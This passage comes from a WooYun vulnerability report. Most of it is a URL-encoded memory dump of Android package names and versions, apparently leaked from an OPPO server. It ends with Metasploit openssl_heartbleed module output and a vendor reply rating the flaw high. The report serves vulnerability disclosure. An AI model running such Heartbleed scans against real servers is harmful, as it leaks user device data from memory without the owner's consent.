253A%2522com.android.noisefield%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.packageinstaller%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.phasebeam%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.phone%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.protips%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.applications%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.calendar%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.contacts%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.downloads%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.drm%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.media%2522%252C%2522version%2522%253A513%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.partnerbookmarks%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.settings%2522%252C%2522version%2522%253A102%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.telephony%2522%252C%2522version%2522%253A10107%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.userdictionary%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.provision%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.quicksearchbox%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.settings%2522%252C%2522version%2522%253A102%257D%252C%257B%2522package_name%2522%253A%2522com.android.sharedstoragebackup%2522%252C%2522version%2522%253A16%257D%252C%257B%2522package_name%2522%253A%2522com.android.simmelock%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.stk%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.systemui%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.vpndialogs%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.wallpaper.holospiral%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.wallpaper.livepicker%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.BaiduMap%2522%252C%2522version%2522%253A386%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.input_oppo%2522%252C%2522version%2522%253A40%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.map.location%2522%252C%2522version%2522%253A30%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.searchbox_oppo%2522%252C%2522version%2522%253A16781331%257D%252C%257B%2522package_name%2522%253A%2522com.dewmobile.kuaiya%2522%252C%2522version%2522%253A20000%257D%252C%257B%2522package_name%2522%253A%2522com.etao.kaka.oppo%2522%252C%2522version%2522%253A24%257D%252C%257B%2522package_name%2522%253A%2522com.gps.topshowcnr%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.iflytek.speech%2522%252C%2522version%2522%253A11121%257D%252C%257B%2522package_name%2522%253A%2522com.kugou.android%2522%252C%2522version%2522%253A7092%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.CellConnService%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.FMRadio%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.StkSelection%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.appwidget.worldclock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.apst.target%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.bluetooth%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.connectivity%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.data%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.engineermode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.mtklogger%2522%252C%2522version%2522%253A30000%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.omacp%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.schpwronoff%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.mint%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.mocha%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.raspberry%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.thermalmanager%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.videofavorites%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.voicecommand%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.weather%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.ygps%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.monotype.android.font.mheiprcmedium%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.monotype.android.font.myoungprcmedium%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.gamecenter%2522%252C%2522version%2522%253A421%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.gamecenter.ddz.nearme.gamecenter%2522%252C%2522version%2522%253A13%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.note%2522%252C%2522version%2522%253A222%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.ocloud%2522%252C%2522version%2522%253A20%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.romupdate%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.statistics.rom%2522%252C%2522version%2522%253A202%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.sync%2522%252C%2522version%2522%253A15%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.themespace%2522%252C%2522version%2522%253A22%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.themespacelib%2522%252C%2522version%2522%253A9%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.LockScreenGlassBoard%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.LockScreenWeather%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoPasswordUnlock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoPatternUnlock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoSimUnlockScreen%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.activation%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.agpseposetting%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.alarmclock%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.allowusbdebuggingcritically%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.autoaging%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.autotest%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.backuprestore%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.backuprestore.remoteservice%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.blacklist%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.bootreg%2522%252C%2522version%2522%253A100100%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.c2u%2522%252C%2522version%2522%253A3%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.camera%2522%252C%2522version%2522%253A40000%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.card%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.community%2522%252C%2522version%2522%253A40400%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.compass%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.engineermode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.exserviceui%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.factorygps%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.filemanager%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.findmyphone%2522%252C%2522version%2522%253A12%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.flashlight%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.free.weather%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.gallery3d%2522%252C%2522version%2522%253A40000%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.gesture%2522%252C%2522version%2522%253A10100%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.gestureguide%2522%252C%2522version%2522%253A10100%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.gestureguide.custom%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.globaltheme.proxydigitalclockwidget%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.globalthemecontentprovider%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.holidaymode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.kinect%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.launcher%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.launcherSystem%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.lcdcolorshow%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.lockmanager%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.market%2522%252C%2522version%2522%253A321%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.music%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.newsimdetect%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.operationManual%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.orignalunlock.jbtwo%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.ota%2522%252C%2522version%2522%253A27%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.phonenoareainquire%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.powermanager%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.preventmode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.providers.permissions%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.proxykeyguard%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.purebackground%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.reader%2522%252C%2522version%2522%253A231%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.safe%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.safeprovider%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.sdcardservice%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.secure%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.service.account%2522%252C%2522version%2522%253A240%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.speechassist%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.speechassist.engine%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.trafficmonitor%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.travel%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.ubeauty%2522%252C%2522version%2522%253A40500%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.usbselection%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.usercenter%2522%252C%2522version%2522%253A240%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.video%2522%252C%2522version%2522%253A1%257D%252C@%257B%2522package_name%2522%253A%2522com.oppo.vistormode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.voiceprint%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.wallpaper%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.weather%2522%252C%2522version%2522%253A30501%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.weather.locationservice%2522%252C%2522version%2522%253A10201%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.calendar%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.digitalclock%2522%252C%2522version%2522%253A9%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.moodalbum%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.musi
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >

漏洞证明:

修复方案:

*

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-26 18:35

厂商回复:

感谢支持。

最新状态:

暂无